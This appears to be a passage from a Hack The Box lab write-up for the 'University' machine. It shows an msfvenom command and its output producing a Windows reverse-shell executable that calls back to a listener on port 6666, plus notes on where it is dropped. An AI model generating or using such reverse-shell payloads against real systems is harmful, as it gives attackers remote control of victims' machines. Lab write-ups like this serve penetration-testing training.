msfvenom
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.99.1 LPORT=6666 -f exe -o r_to_dc.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: r_to_dc.exe
msfvenom generated a reverse shell executable
- This reverse shell executable connects to the
dc.university.htb
host on the port6666
over the192.168.99.0/24
network. - It will be placed on
C:\tmp
directory on thews-3.university.htb
host